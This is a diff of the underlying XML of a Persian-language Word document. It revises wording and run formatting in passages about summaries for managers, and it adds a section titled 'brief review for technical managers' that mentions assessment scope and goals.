--- a/P325_345.docx
+++ b/P325_345.docx
@@ -20121,17 +20121,47 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>خلاصه شده</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> به دست و به مد</w:t>
+        <w:t xml:space="preserve">خلاصه </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>می کند و</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>به</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> مد</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20225,6 +20255,16 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">این ایده را </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -20261,27 +20301,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>،</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>این</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -21213,24 +21233,3840 @@
           <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:bidi/>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>II</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>بررس</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> اجمال</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> مد</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ر</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ت</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> فن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>بخش بررس</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> اجمال</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> مد</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ر</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ت</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> فن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> اغلب به مد</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ران</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> فن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>از</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> دارد که</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> آنها</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>از</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> به جزئ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ات</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> فن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ب</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>شتر</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> از آنچه در خلاصه </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>اجرایی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> پ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>دا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> می شود دارند</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>. ا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> بخش با</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>د</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> شامل جزئ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ات</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> مربوط به دامنه ارز</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>اب</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>،</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> اهداف و موارد </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
